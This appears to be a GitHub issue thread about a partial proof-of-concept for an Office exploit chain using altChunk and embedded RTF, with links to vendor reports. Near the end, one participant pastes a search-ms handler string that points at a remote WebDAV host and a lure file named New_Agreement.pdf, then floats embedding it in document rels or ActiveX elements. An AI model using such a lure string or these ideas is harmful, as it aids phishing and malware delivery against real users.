Due to a lack of further information, the exact exploitation can not be shown.

[danielsadoc]

please, what is meant by "Due to a lack of further information, the exact exploitation can not be shown."? what are the assumptions/system requirements for the provided PoC to work?

[jakabakos]

Hey!

1. The original attack chain is quite complex and there is not enough public information about it so I was able to create a PoC about the first part (that is related to altChunk and embedding RTF). This is what this script does. Soon the related blog post will be published on vsociety and everything will be more clear hopefully.
2. This is a Python script so there are no requirements beyond having Python3 and the mentioned pip packages installed ion the system.

[hastalamuerte]

https://unit42.paloaltonetworks.com/new-cve-2023-36584-discovered-in-attack-chain-used-by-russian-apt/ maybe it can help to create a poc . there is a research about vbs motw bypass in x by Will Dormann and in other posts.

[hastalamuerte]

search:query=New_Agreement.pdf&crumb=location:\84.32.189.74@80\underwall\society&displayname=Downloads

Here is an example of using and abusing Ms search . I was assumed when follina reveal that another handlers will be abused. Btw there is much more of em..

And some more info . https://thehackernews.com/2024/02/darkme-malware-targets-traders-using.html?m=1 https://www.trendmicro.com/it_it/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html

It's not a doc , but think there is a some way to use it in rels

[hastalamuerte]

Also maybe there is possibility to use it active x button or some another elements in doc.